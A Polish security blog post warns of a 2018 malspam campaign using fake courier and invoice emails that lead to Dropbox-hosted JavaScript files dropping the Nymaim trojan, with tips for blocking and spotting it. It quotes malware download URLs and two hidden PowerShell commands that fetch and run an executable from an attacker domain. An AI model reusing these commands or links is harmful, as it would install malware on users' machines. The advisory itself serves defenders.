Uwaga na dużą falę ataków – a każdy z innym tematem, linkiem i plikiem

dodał 8 lutego 2018 o 10:22 w kategorii Złośniki  z tagami:
Uwaga na dużą falę ataków – a każdy z innym tematem, linkiem i plikiem

Automatyzacja i indywidualne targetowanie do tej pory były głównie tematami prezentacji w korporacjach. Czasy jednak się zmieniają, świat ewoluuje i metody marketingowców coraz częściej wchodzą do repertuaru działań przestępców.

Obserwujemy dzisiaj dość sporą kampanię złośliwego oprogramowania, w której praktycznie każda analizowana próbka wygląda trochę inaczej, pobierana jest z innego adresu oraz, co gorsza, bardzo słabo lub wcale nie reagują na nią antywirusy.

Tematów pod dostatkiem

Wiadomości które do tej pory do nas trafiły nosiły następujące tematy:

  • Twoja paczka nie zostala dostarczona, [10 cyfr]
  • Rachunek z tytulu przechowywania przesylki, [10 cyfr]
  • Twoja przesylka nie zostala dostarczona, [10 cyfr]
  • Paczka nie zostala dostarczona, [10 cyfr]
  • Odbiór akt zamówienia, [10 cyfr]

Tu wskazówka dla administratorów – możecie śmiało wrzucać do kwarantanny wszystkie emaile, których tematy kończą się przecinkiem spacją i 10 cyframi oraz których adres nadawcy to „support_[5 cyfr]@o2.pl – to jedyny wzorzec jaki udało się nam ustalić.

Wiadomość wygląda następująco:

lub tak:

Zwróćcie uwagę, ile elementów je różni: temat, nadawca, numer faktury, data faktury, numer przesyłki, kwota wpłaty, treść linka, nawet rozmiar czcionki. Co więcej, każda z próbek, które znaleźliśmy, prowadzi do innego adresu w serwisie Dropbox, np.:

https://www.dropbox.com/s/h4d02fahxpxkhg3/Faktura_VAT_35486518396.js?dl=1
https://www.dropbox.com/s/ihmosoh769h5643/Faktura_VAT_54610903750.js?dl=1
https://www.dropbox.com/s/l4vqjjoctlqdi98/Faktura_VAT_88461403495.js?dl=1
https://www.dropbox.com/s/hmixw8y1cizkmou/Faktura_VAT_94939006818.js?dl=1
https://www.dropbox.com/s/4qe41rve2djvitu/Faktura_VAT_00240044567.js?dl=1

Gdy pisaliśmy ten artykuł, 4 z 5 plików ciągle były dostępne (oczywiście każdy odrobinę inny) a ich wykrywalność w serwisie VirusTotal wynosiła między 0/59 a 2/59.

Każdy z plików zawiera odrobinę inny link do pobrania złośliwego oprogramowania:

"C:\Windows\System32\cmd.exe" /c powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass (new-object system.net.webclient).downloadfile('https://dhl-private.com/jteer.php?yzNOkG','%appdaTA%hwz49.eXe'); Start-ProcESS '%Appdata%hwz49.Exe'
"C:\Windows\System32\cmd.exe" /c powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass (new-object system.net.webclient).downloadfile('https://dhl-private.com/jteer.php?gHTe','%appdaTa%jwH87.exe'); staRt-proCess '%appDaTA%jwH87.exe'

Dopiero pobierany złośliwy plik wykonywalny jest tym, co łączy te próbki – w każdej z wersji linka dostaliśmy ten sam ładunek (choć możliwe że ta sama ofiara dostaje ten sam plik w oparciu o IP). Wszystkie linki prowadzą do https://dhl-private.com – możecie ten adres zablokować w swojej sieci i patrzeć, kto klika.

Sam docelowy (?) złośliwy plik wyczynia różne cyrki a jak donoszą nam nasi analitycy, na końcu zostawia konia trojańskiego Nymaim.

Co dość rzadkie, emaile wysyłane są faktycznie z serwerów o2.pl.

Received: from mx-out.tlen.pl (193.222.135.174) (HELO mx-out.tlen.pl)

Wygląda na to, ze ktoś dużo kont założył…

Słuchacze naszych wykładów mieli szansę wykryć atak

Analizując takie ataki zawsze patrzymy w notatki, czy omawiamy ich elementy w trakcie naszych wykładów uświadamiających pracowników. Tutaj możemy tylko pokiwać głową, bo w slajdach nic nie trzeba modyfikować. Mamy co najmniej pięć czynników ryzyka, które razem powinny zniechęcić do uruchomienia załącznika:

  • email „od kuriera”,
  • brak danych odbiorcy w treści,
  • brak polskich liter w temacie wiadomości,
  • link do Dropbox.com,
  • pobierany plik ma rozszerzenie nieznane większości użytkowników.

Jeśli chcecie, by podobnie rozumowali Wasi pracownicy, to nic prostszego jak nas zaprosić – pokażemy, wyjaśnimy, nauczymy.